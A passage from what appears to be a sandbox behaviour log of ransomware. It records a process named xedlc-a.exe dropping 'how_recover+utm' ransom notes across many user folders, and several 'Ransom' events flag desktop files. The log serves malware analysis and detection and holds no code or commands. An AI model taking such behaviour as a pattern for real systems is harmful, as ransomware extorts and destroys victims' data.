59323.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_16\how_recover+utm.html
59324.          filesize: 9495
59325.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59326.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59327.          processinfo:
59328.            pid: 1056
59329.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59330.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59331.            ads:
59332.          fid (ads:): 281474976778436
59333.          ntstatus: 0x0
59334.          CreateOptions: 0x0
59335.        file:
59336.          timestamp: 90499
59337.          mode: created
59338.          sequenceNumber: 1589
59339.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.txt
59340.          processinfo:
59341.            pid: 1056
59342.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59343.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59344.            ads:
59345.          fid (ads:): 281474976778437
59346.          ntstatus: 0x0
59347.          CreateOptions: 0x60
59348.        file:
59349.          timestamp: 90505
59350.          mode: close
59351.          sequenceNumber: 1590
59352.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.txt
59353.          filesize: 2682
59354.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59355.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59356.          processinfo:
59357.            pid: 1056
59358.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59359.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59360.            ads:
59361.          fid (ads:): 281474976778437
59362.          ntstatus: 0x0
59363.          CreateOptions: 0x0
59364.        file:
59365.          timestamp: 90561
59366.          mode: created
59367.          sequenceNumber: 1591
59368.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.html
59369.          processinfo:
59370.            pid: 1056
59371.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59372.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59373.            ads:
59374.          fid (ads:): 281474976778438
59375.          ntstatus: 0x0
59376.          CreateOptions: 0x60
59377.        file:
59378.          timestamp: 90568
59379.          mode: close
59380.          sequenceNumber: 1592
59381.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.6.0_31\how_recover+utm.html
59382.          filesize: 9495
59383.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59384.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59385.          processinfo:
59386.            pid: 1056
59387.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59388.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59389.            ads:
59390.          fid (ads:): 281474976778438
59391.          ntstatus: 0x0
59392.          CreateOptions: 0x0
59393.        file:
59394.          timestamp: 90576
59395.          mode: created
59396.          sequenceNumber: 1593
59397.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.txt
59398.          processinfo:
59399.            pid: 1056
59400.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59401.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59402.            ads:
59403.          fid (ads:): 281474976778439
59404.          ntstatus: 0x0
59405.          CreateOptions: 0x60
59406.        file:
59407.          timestamp: 90582
59408.          mode: close
59409.          sequenceNumber: 1594
59410.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.txt
59411.          filesize: 2682
59412.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59413.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59414.          processinfo:
59415.            pid: 1056
59416.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59417.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59418.            ads:
59419.          fid (ads:): 281474976778439
59420.          ntstatus: 0x0
59421.          CreateOptions: 0x0
59422.        file:
59423.          timestamp: 90612
59424.          mode: created
59425.          sequenceNumber: 1595
59426.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.html
59427.          processinfo:
59428.            pid: 1056
59429.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59430.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59431.            ads:
59432.          fid (ads:): 281474976778440
59433.          ntstatus: 0x0
59434.          CreateOptions: 0x60
59435.        file:
59436.          timestamp: 90617
59437.          mode: close
59438.          sequenceNumber: 1596
59439.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0\how_recover+utm.html
59440.          filesize: 9495
59441.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59442.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59443.          processinfo:
59444.            pid: 1056
59445.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59446.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59447.            ads:
59448.          fid (ads:): 281474976778440
59449.          ntstatus: 0x0
59450.          CreateOptions: 0x0
59451.        file:
59452.          timestamp: 90625
59453.          mode: created
59454.          sequenceNumber: 1597
59455.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.txt
59456.          processinfo:
59457.            pid: 1056
59458.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59459.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59460.            ads:
59461.          fid (ads:): 281474976778441
59462.          ntstatus: 0x0
59463.          CreateOptions: 0x60
59464.        file:
59465.          timestamp: 90631
59466.          mode: close
59467.          sequenceNumber: 1598
59468.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.txt
59469.          filesize: 2682
59470.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59471.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59472.          processinfo:
59473.            pid: 1056
59474.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59475.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59476.            ads:
59477.          fid (ads:): 281474976778441
59478.          ntstatus: 0x0
59479.          CreateOptions: 0x0
59480.        file:
59481.          timestamp: 90653
59482.          mode: created
59483.          sequenceNumber: 1599
59484.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.html
59485.          processinfo:
59486.            pid: 1056
59487.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59488.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59489.            ads:
59490.          fid (ads:): 281474976778442
59491.          ntstatus: 0x0
59492.          CreateOptions: 0x60
59493.        file:
59494.          timestamp: 90659
59495.          mode: close
59496.          sequenceNumber: 1600
59497.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_09\how_recover+utm.html
59498.          filesize: 9495
59499.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59500.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59501.          processinfo:
59502.            pid: 1056
59503.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59504.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59505.            ads:
59506.          fid (ads:): 281474976778442
59507.          ntstatus: 0x0
59508.          CreateOptions: 0x0
59509.        file:
59510.          timestamp: 90669
59511.          mode: created
59512.          sequenceNumber: 1601
59513.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.txt
59514.          processinfo:
59515.            pid: 1056
59516.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59517.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59518.            ads:
59519.          fid (ads:): 281474976778443
59520.          ntstatus: 0x0
59521.          CreateOptions: 0x60
59522.        file:
59523.          timestamp: 90675
59524.          mode: close
59525.          sequenceNumber: 1602
59526.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.txt
59527.          filesize: 2682
59528.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59529.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59530.          processinfo:
59531.            pid: 1056
59532.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59533.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59534.            ads:
59535.          fid (ads:): 281474976778443
59536.          ntstatus: 0x0
59537.          CreateOptions: 0x0
59538.        file:
59539.          timestamp: 90722
59540.          mode: created
59541.          sequenceNumber: 1603
59542.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.html
59543.          processinfo:
59544.            pid: 1056
59545.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59546.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59547.            ads:
59548.          fid (ads:): 281474976778444
59549.          ntstatus: 0x0
59550.          CreateOptions: 0x60
59551.        file:
59552.          timestamp: 90728
59553.          mode: close
59554.          sequenceNumber: 1604
59555.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\jre1.7.0_13\how_recover+utm.html
59556.          filesize: 9495
59557.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59558.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59559.          processinfo:
59560.            pid: 1056
59561.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59562.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59563.            ads:
59564.          fid (ads:): 281474976778444
59565.          ntstatus: 0x0
59566.          CreateOptions: 0x0
59567.        file:
59568.          timestamp: 90736
59569.          mode: created
59570.          sequenceNumber: 1605
59571.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.txt
59572.          processinfo:
59573.            pid: 1056
59574.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59575.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59576.            ads:
59577.          fid (ads:): 281474976778445
59578.          ntstatus: 0x0
59579.          CreateOptions: 0x60
59580.        file:
59581.          timestamp: 90741
59582.          mode: close
59583.          sequenceNumber: 1606
59584.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.txt
59585.          filesize: 2682
59586.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59587.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59588.          processinfo:
59589.            pid: 1056
59590.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59591.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59592.            ads:
59593.          fid (ads:): 281474976778445
59594.          ntstatus: 0x0
59595.          CreateOptions: 0x0
59596.        file:
59597.          timestamp: 90748
59598.          mode: created
59599.          sequenceNumber: 1607
59600.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.html
59601.          processinfo:
59602.            pid: 1056
59603.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59604.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59605.            ads:
59606.          fid (ads:): 281474976778446
59607.          ntstatus: 0x0
59608.          CreateOptions: 0x60
59609.        file:
59610.          timestamp: 90754
59611.          mode: close
59612.          sequenceNumber: 1608
59613.          value: C:\Documents and Settings\admin\Application Data\Sun\Java\how_recover+utm.html
59614.          filesize: 9495
59615.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59616.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59617.          processinfo:
59618.            pid: 1056
59619.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59620.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59621.            ads:
59622.          fid (ads:): 281474976778446
59623.          ntstatus: 0x0
59624.          CreateOptions: 0x0
59625.        file:
59626.          timestamp: 90762
59627.          mode: created
59628.          sequenceNumber: 1609
59629.          value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.txt
59630.          processinfo:
59631.            pid: 1056
59632.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59633.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59634.            ads:
59635.          fid (ads:): 281474976778447
59636.          ntstatus: 0x0
59637.          CreateOptions: 0x60
59638.        file:
59639.          timestamp: 90767
59640.          mode: close
59641.          sequenceNumber: 1610
59642.          value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.txt
59643.          filesize: 2682
59644.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59645.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59646.          processinfo:
59647.            pid: 1056
59648.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59649.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59650.            ads:
59651.          fid (ads:): 281474976778447
59652.          ntstatus: 0x0
59653.          CreateOptions: 0x0
59654.        file:
59655.          timestamp: 90774
59656.          mode: created
59657.          sequenceNumber: 1611
59658.          value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.html
59659.          processinfo:
59660.            pid: 1056
59661.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59662.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59663.            ads:
59664.          fid (ads:): 281474976778448
59665.          ntstatus: 0x0
59666.          CreateOptions: 0x60
59667.        file:
59668.          timestamp: 90779
59669.          mode: close
59670.          sequenceNumber: 1612
59671.          value: C:\Documents and Settings\admin\Application Data\Sun\how_recover+utm.html
59672.          filesize: 9495
59673.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59674.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59675.          processinfo:
59676.            pid: 1056
59677.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59678.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59679.            ads:
59680.          fid (ads:): 281474976778448
59681.          ntstatus: 0x0
59682.          CreateOptions: 0x0
59683.        file:
59684.          timestamp: 90807
59685.          mode: created
59686.          sequenceNumber: 1613
59687.          value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.txt
59688.          processinfo:
59689.            pid: 1056
59690.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59691.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59692.            ads:
59693.          fid (ads:): 281474976778449
59694.          ntstatus: 0x0
59695.          CreateOptions: 0x60
59696.        file:
59697.          timestamp: 90812
59698.          mode: close
59699.          sequenceNumber: 1614
59700.          value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.txt
59701.          filesize: 2682
59702.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59703.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59704.          processinfo:
59705.            pid: 1056
59706.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59707.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59708.            ads:
59709.          fid (ads:): 281474976778449
59710.          ntstatus: 0x0
59711.          CreateOptions: 0x0
59712.        file:
59713.          timestamp: 90846
59714.          mode: created
59715.          sequenceNumber: 1615
59716.          value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.html
59717.          processinfo:
59718.            pid: 1056
59719.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59720.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59721.            ads:
59722.          fid (ads:): 281474976778450
59723.          ntstatus: 0x0
59724.          CreateOptions: 0x60
59725.        file:
59726.          timestamp: 90852
59727.          mode: close
59728.          sequenceNumber: 1616
59729.          value: C:\Documents and Settings\admin\Application Data\vlc\how_recover+utm.html
59730.          filesize: 9495
59731.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59732.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59733.          processinfo:
59734.            pid: 1056
59735.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59736.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59737.            ads:
59738.          fid (ads:): 281474976778450
59739.          ntstatus: 0x0
59740.          CreateOptions: 0x0
59741.        file:
59742.          timestamp: 90858
59743.          mode: created
59744.          sequenceNumber: 1617
59745.          value: C:\Documents and Settings\admin\Application Data\how_recover+utm.txt
59746.          processinfo:
59747.            pid: 1056
59748.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59749.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59750.            ads:
59751.          fid (ads:): 281474976778451
59752.          ntstatus: 0x0
59753.          CreateOptions: 0x60
59754.        file:
59755.          timestamp: 90864
59756.          mode: close
59757.          sequenceNumber: 1618
59758.          value: C:\Documents and Settings\admin\Application Data\how_recover+utm.txt
59759.          filesize: 2682
59760.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59761.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59762.          processinfo:
59763.            pid: 1056
59764.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59765.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59766.            ads:
59767.          fid (ads:): 281474976778451
59768.          ntstatus: 0x0
59769.          CreateOptions: 0x0
59770.        file:
59771.          timestamp: 90870
59772.          mode: created
59773.          sequenceNumber: 1619
59774.          value: C:\Documents and Settings\admin\Application Data\how_recover+utm.html
59775.          processinfo:
59776.            pid: 1056
59777.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59778.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59779.            ads:
59780.          fid (ads:): 281474976778452
59781.          ntstatus: 0x0
59782.          CreateOptions: 0x60
59783.        file:
59784.          timestamp: 90876
59785.          mode: close
59786.          sequenceNumber: 1620
59787.          value: C:\Documents and Settings\admin\Application Data\how_recover+utm.html
59788.          filesize: 9495
59789.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59790.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59791.          processinfo:
59792.            pid: 1056
59793.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59794.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59795.            ads:
59796.          fid (ads:): 281474976778452
59797.          ntstatus: 0x0
59798.          CreateOptions: 0x0
59799.        file:
59800.          timestamp: 90884
59801.          mode: created
59802.          sequenceNumber: 1621
59803.          value: C:\Documents and Settings\admin\Cookies\how_recover+utm.txt
59804.          processinfo:
59805.            pid: 1056
59806.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59807.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59808.            ads:
59809.          fid (ads:): 281474976778453
59810.          ntstatus: 0x0
59811.          CreateOptions: 0x60
59812.        file:
59813.          timestamp: 90890
59814.          mode: close
59815.          sequenceNumber: 1622
59816.          value: C:\Documents and Settings\admin\Cookies\how_recover+utm.txt
59817.          filesize: 2682
59818.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59819.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59820.          processinfo:
59821.            pid: 1056
59822.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59823.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59824.            ads:
59825.          fid (ads:): 281474976778453
59826.          ntstatus: 0x0
59827.          CreateOptions: 0x0
59828.        file:
59829.          timestamp: 90898
59830.          mode: created
59831.          sequenceNumber: 1623
59832.          value: C:\Documents and Settings\admin\Cookies\how_recover+utm.html
59833.          processinfo:
59834.            pid: 1056
59835.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59836.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59837.            ads:
59838.          fid (ads:): 281474976778454
59839.          ntstatus: 0x0
59840.          CreateOptions: 0x60
59841.        file:
59842.          timestamp: 90903
59843.          mode: close
59844.          sequenceNumber: 1624
59845.          value: C:\Documents and Settings\admin\Cookies\how_recover+utm.html
59846.          filesize: 9495
59847.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59848.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59849.          processinfo:
59850.            pid: 1056
59851.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59852.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59853.            ads:
59854.          fid (ads:): 281474976778454
59855.          ntstatus: 0x0
59856.          CreateOptions: 0x0
59857.        Ransom:
59858.          timestamp: 90998
59859.          sequenceNumber: 1625
59860.          pattern: MC
59861.          value: C:\Documents and Settings\admin\Desktop\bUkcJj.txt
59862.          md5sum: 6450f54ec4000d28a82dc1daaaa82680
59863.        Ransom:
59864.          timestamp: 91684
59865.          sequenceNumber: 1626
59866.          pattern: MC
59867.          value: C:\Documents and Settings\admin\Desktop\BvVaB_o.xls
59868.          md5sum: d610d320106d97862dce6cb0157e2c03
59869.        Ransom:
59870.          timestamp: 91753
59871.          sequenceNumber: 1627
59872.          pattern: MC
59873.          value: C:\Documents and Settings\admin\Desktop\huKZKN.doc
59874.          md5sum: 6bf3ede98bab0f2d6a6f38ba63d68939
59875.        Ransom:
59876.          timestamp: 91794
59877.          sequenceNumber: 1628
59878.          pattern: MC
59879.          value: C:\Documents and Settings\admin\Desktop\liJRS.jpg
59880.          md5sum: 980a526cf80358459ec855165596e154
59881.        Ransom:
59882.          timestamp: 91849
59883.          sequenceNumber: 1629
59884.          pattern: MC
59885.          value: C:\Documents and Settings\admin\Desktop\SeuRdneRhX.ppt
59886.          md5sum: 32b93875f6417c6c7ee1e62928537a79
59887.        Ransom:
59888.          timestamp: 91868
59889.          sequenceNumber: 1630
59890.          pattern: MC
59891.          value: C:\Documents and Settings\admin\Desktop\WDntnmnTP.png
59892.          md5sum: cd7c94a9e10cc27d80b3db781c7da310
59893.        file:
59894.          timestamp: 91876
59895.          mode: created
59896.          sequenceNumber: 1631
59897.          value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.txt
59898.          processinfo:
59899.            pid: 1056
59900.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59901.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59902.            ads:
59903.          fid (ads:): 281474976778455
59904.          ntstatus: 0x0
59905.          CreateOptions: 0x60
59906.        file:
59907.          timestamp: 91883
59908.          mode: close
59909.          sequenceNumber: 1632
59910.          value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.txt
59911.          filesize: 2682
59912.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59913.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59914.          processinfo:
59915.            pid: 1056
59916.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59917.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59918.            ads:
59919.          fid (ads:): 281474976778455
59920.          ntstatus: 0x0
59921.          CreateOptions: 0x0
59922.        file:
59923.          timestamp: 91891
59924.          mode: created
59925.          sequenceNumber: 1633
59926.          value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.html
59927.          processinfo:
59928.            pid: 1056
59929.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59930.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59931.            ads:
59932.          fid (ads:): 281474976778456
59933.          ntstatus: 0x0
59934.          CreateOptions: 0x60
59935.        file:
59936.          timestamp: 91897
59937.          mode: close
59938.          sequenceNumber: 1634
59939.          value: C:\Documents and Settings\admin\Favorites\Links\how_recover+utm.html
59940.          filesize: 9495
59941.          md5sum: 95f596a25dff51b6af2042b1bbe02985
59942.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
59943.          processinfo:
59944.            pid: 1056
59945.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59946.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59947.            ads:
59948.          fid (ads:): 281474976778456
59949.          ntstatus: 0x0
59950.          CreateOptions: 0x0
59951.        file:
59952.          timestamp: 91943
59953.          mode: created
59954.          sequenceNumber: 1635
59955.          value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.txt
59956.          processinfo:
59957.            pid: 1056
59958.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59959.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59960.            ads:
59961.          fid (ads:): 281474976778457
59962.          ntstatus: 0x0
59963.          CreateOptions: 0x60
59964.        file:
59965.          timestamp: 91949
59966.          mode: close
59967.          sequenceNumber: 1636
59968.          value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.txt
59969.          filesize: 2682
59970.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
59971.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
59972.          processinfo:
59973.            pid: 1056
59974.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59975.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59976.            ads:
59977.          fid (ads:): 281474976778457
59978.          ntstatus: 0x0
59979.          CreateOptions: 0x0
59980.        file:
59981.          timestamp: 91957
59982.          mode: created
59983.          sequenceNumber: 1637
59984.          value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.html
59985.          processinfo:
59986.            pid: 1056
59987.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
59988.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
59989.            ads:
59990.          fid (ads:): 281474976778458
59991.          ntstatus: 0x0
59992.          CreateOptions: 0x60
59993.        file:
59994.          timestamp: 91963
59995.          mode: close
59996.          sequenceNumber: 1638
59997.          value: C:\Documents and Settings\admin\Favorites\Microsoft Websites\how_recover+utm.html
59998.          filesize: 9495
59999.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60000.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60001.          processinfo:
60002.            pid: 1056
60003.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60004.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60005.            ads:
60006.          fid (ads:): 281474976778458
60007.          ntstatus: 0x0
60008.          CreateOptions: 0x0
60009.        file:
60010.          timestamp: 91970
60011.          mode: created
60012.          sequenceNumber: 1639
60013.          value: C:\Documents and Settings\admin\Favorites\how_recover+utm.txt
60014.          processinfo:
60015.            pid: 1056
60016.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60017.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60018.            ads:
60019.          fid (ads:): 281474976778459
60020.          ntstatus: 0x0
60021.          CreateOptions: 0x60
60022.        file:
60023.          timestamp: 91977
60024.          mode: close
60025.          sequenceNumber: 1640
60026.          value: C:\Documents and Settings\admin\Favorites\how_recover+utm.txt
60027.          filesize: 2682
60028.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60029.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60030.          processinfo:
60031.            pid: 1056
60032.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60033.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60034.            ads:
60035.          fid (ads:): 281474976778459
60036.          ntstatus: 0x0
60037.          CreateOptions: 0x0
60038.        file:
60039.          timestamp: 91983
60040.          mode: created
60041.          sequenceNumber: 1641
60042.          value: C:\Documents and Settings\admin\Favorites\how_recover+utm.html
60043.          processinfo:
60044.            pid: 1056
60045.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60046.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60047.            ads:
60048.          fid (ads:): 281474976778460
60049.          ntstatus: 0x0
60050.          CreateOptions: 0x60
60051.        file:
60052.          timestamp: 91990
60053.          mode: close
60054.          sequenceNumber: 1642
60055.          value: C:\Documents and Settings\admin\Favorites\how_recover+utm.html
60056.          filesize: 9495
60057.          md5sum: 95f596a25dff51b6af2042b1bbe02985
60058.          sha1sum: 830c472ed6839269ebf9badb9630665f56b5b769
60059.          processinfo:
60060.            pid: 1056
60061.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60062.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60063.            ads:
60064.          fid (ads:): 281474976778460
60065.          ntstatus: 0x0
60066.          CreateOptions: 0x0
60067.        file:
60068.          timestamp: 91997
60069.          mode: created
60070.          sequenceNumber: 1643
60071.          value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.txt
60072.          processinfo:
60073.            pid: 1056
60074.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60075.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60076.            ads:
60077.          fid (ads:): 281474976778461
60078.          ntstatus: 0x0
60079.          CreateOptions: 0x60
60080.        file:
60081.          timestamp: 92004
60082.          mode: close
60083.          sequenceNumber: 1644
60084.          value: C:\Documents and Settings\admin\IETldCache\how_recover+utm.txt
60085.          filesize: 2682
60086.          md5sum: dbb0eda595eb83a05d3bc771ae2561a4
60087.          sha1sum: 8817eb000624ef661f59ea1d64309dcd4701d02b
60088.          processinfo:
60089.            pid: 1056
60090.            imagepath: C:\Documents and Settings\admin\Application Data\xedlc-a.exe
60091.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
60092.            ads:
60093.          fid (ads:): 281474976778461
60094.          ntstatus: 0x0
60095.          CreateOptions: 0x0
60096.        file:
60097.          timestamp: 92190
60098.          mode: created
60099.          sequenceNumber: 1645
